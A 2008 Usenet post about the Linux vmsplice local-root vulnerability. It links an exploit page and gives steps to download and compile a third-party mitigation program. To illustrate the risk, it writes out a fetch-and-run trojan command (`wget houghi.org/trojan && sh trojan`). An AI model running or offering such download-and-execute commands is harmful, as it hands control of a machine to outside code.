Posted by houghi on alt.os.linux.suse

http://disruptive.org.uk/2008/02/10/...t_exploit.html
http://it.slashdot.org/article.pl?sid=08/02/10/2011257
http://www.milw0rm.com/exploits/5092
http://bugs.debian.org/cgi-bin/bugre...?bug=464953#14

1) See that gcc is installed
2) Download
http://www.ping.uio.no/~mortehu/disa...-exploitable.c
3) run `gcc disable-vmsplice-if-exploitable.c -o disable--exploitable`
4) run `./disable-exploitable`

Do this on ALL your machines.

This is realy serious, as it means that ANY local user can otherwise
become root. This means that the following could be extremely dangerous:
`wget houghi.org/trojan && sh trojan`, because that could now run a code
as root and do whatever.

Tested on a gusty machine, the fix works

--
Cheers Malcolm (Linux Counter #276890)
SLED 10.0 SP1 x86_64 Kernel 2.6.16.54-0.2.5-smp
up 3 days 0:38, 3 users, load average: 1.40, 1.34, 1.20